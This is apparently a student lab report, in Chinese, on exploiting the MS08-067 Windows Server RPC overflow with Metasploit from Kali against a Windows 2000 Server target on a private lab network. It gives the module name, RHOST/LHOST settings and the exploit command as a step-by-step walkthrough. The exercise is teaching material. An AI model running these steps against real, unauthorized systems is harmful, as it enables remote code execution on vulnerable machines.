20169201 使用Metaspoit攻击MS08-067实验

MS08-067漏洞介绍

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”，如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码，此漏洞可用于进行蠕虫攻击，目前已经有利用该漏洞的蠕虫病毒。

本次实验使用的攻击机是kali，靶机是Win2kServer

攻击机：192.168.17.137
靶机：192.168.17.136

1.在Kali中使用metasploit，首先启动PostgreSQL数据库服务和metasploit服务

service postgresql start//启动数据库
service metasploit start//启动metasploit

2.用msfconsole命令开启metasploit的console

3.查找是否存在ms08-067漏洞，看到返回相应信息

4.输入使用该漏洞攻击程序：命令：use exploit/windows/smb/ms08_067_netapi;执行结束后如下：

5.设置靶机和攻击机的地址

set RHOST 192.168.17.136
set LHOST 192.168.17.137

6.接下来就是实施攻击了，执行命令exploit